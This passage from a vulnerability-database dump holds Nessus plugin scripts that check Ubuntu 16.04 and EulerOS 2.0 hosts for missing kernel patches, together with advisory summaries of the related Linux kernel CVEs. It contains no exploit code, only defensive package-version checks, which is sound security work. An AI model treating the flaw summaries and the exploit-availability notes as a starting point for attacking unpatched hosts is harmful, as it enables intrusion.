script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe, linux-gcp, linux-oem vulnerabilities (USN-3617-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-1012-gcp\", pkgver:\"4.13.0-1012.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-1022-oem\", pkgver:\"4.13.0-1022.24\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-38-generic\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-38-generic-lpae\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-38-lowlatency\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.13.0.1012.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.13.0.1012.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.13.0.1022.26\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-gcp / linux-image-4.13-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:52:43", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A vulnerability was found in the key management\n subsystem of the Linux kernel. An update on an\n uninstantiated key could cause a kernel panic, leading\n to denial of service (DoS).(CVE-2017-15299)\n\n - The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel before\n 4.13.8 allows local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed\n setup.(CVE-2017-16525)\n\n - drivers/uwb/uwbd.c in the Linux kernel before 4.13.6\n allows local users to cause a denial of service\n (general protection fault and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16526)\n\n - drivers/usb/core/config.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The get_endpoints function in\n drivers/usb/misc/usbtest.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16532)\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel\n before 4.13.8 allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The uas driver in the Linux kernel before 4.13.6 allows\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device, related to\n drivers/usb/storage/uas-detect.h and\n drivers/usb/storage/uas.c.(CVE-2017-16530)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel before\n 4.13.10 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - A flaw was found that sound/core/timer.c in the Linux\n kernel before 4.11.5 is vulnerable to a data race in\n the ALSA /dev/snd/timer driver resulting in local users\n being able to read information belonging to other\n users. Uninitialized memory contents may be disclosed\n when a read and an ioctl happen at the same\n time.(CVE-2017-1000380)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The cdc_parse_cdc_header function in\n drivers/usb/core/message.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16534)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel before 4.13.6 allows local users to\n cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16529)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-01T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1291)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-15299", "CVE-2017-1000380", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16531", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-16644", "CVE-2017-16530", "CVE-2017-16645"], "modified": "2017-12-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1291.NASL", "href": "https://www.tenable.com/plugins/nessus/104910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104910);\n script_version(\"3.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000380\",\n \"CVE-2017-15299\",\n \"CVE-2017-16525\",\n \"CVE-2017-16526\",\n \"CVE-2017-16529\",\n \"CVE-2017-16530\",\n \"CVE-2017-16531\",\n \"CVE-2017-16532\",\n \"CVE-2017-16533\",\n \"CVE-2017-16534\",\n \"CVE-2017-16535\",\n \"CVE-2017-16536\",\n \"CVE-2017-16537\",\n \"CVE-2017-16538\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n \"CVE-2017-16649\",\n \"CVE-2017-16650\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1291)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A vulnerability was found in the key management\n subsystem of the Linux kernel. An update on an\n uninstantiated key could cause a kernel panic, leading\n to denial of service (DoS).(CVE-2017-15299)\n\n - The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel before\n 4.13.8 allows local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed\n setup.(CVE-2017-16525)\n\n - drivers/uwb/uwbd.c in the Linux kernel before 4.13.6\n allows local users to cause a denial of service\n (general protection fault and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16526)\n\n - drivers/usb/core/config.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The get_endpoints function in\n drivers/usb/misc/usbtest.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16532)\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel\n before 4.13.8 allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The uas driver in the Linux kernel before 4.13.6 allows\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device, related to\n drivers/usb/storage/uas-detect.h and\n drivers/usb/storage/uas.c.(CVE-2017-16530)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel before\n 4.13.10 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - A flaw was found that sound/core/timer.c in the Linux\n kernel before 4.11.5 is vulnerable to a data race in\n the ALSA /dev/snd/timer driver resulting in local users\n being able to read information belonging to other\n users. Uninitialized memory contents may be disclosed\n when a read and an ioctl happen at the same\n time.(CVE-2017-1000380)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The cdc_parse_cdc_header function in\n drivers/usb/core/message.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16534)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel before 4.13.6 allows local users to\n cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16529)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1291\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2e77fd1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.155\",\n \"kernel-debug-3.10.0-229.49.1.155\",\n \"kernel-debuginfo-3.10.0-229.49.1.155\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.155\",\n \"kernel-devel-3.10.0-229.49.1.155\",\n \"kernel-headers-3.10.0-229.49.1.155\",\n \"kernel-tools-3.10.0-229.49.1.155\",\n \"kernel-tools-libs-3.10.0-229.49.1.155\",\n \"perf-3.10.0-229.49.1.155\",\n \"python-perf-3.10.0-229.49.1.155\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : 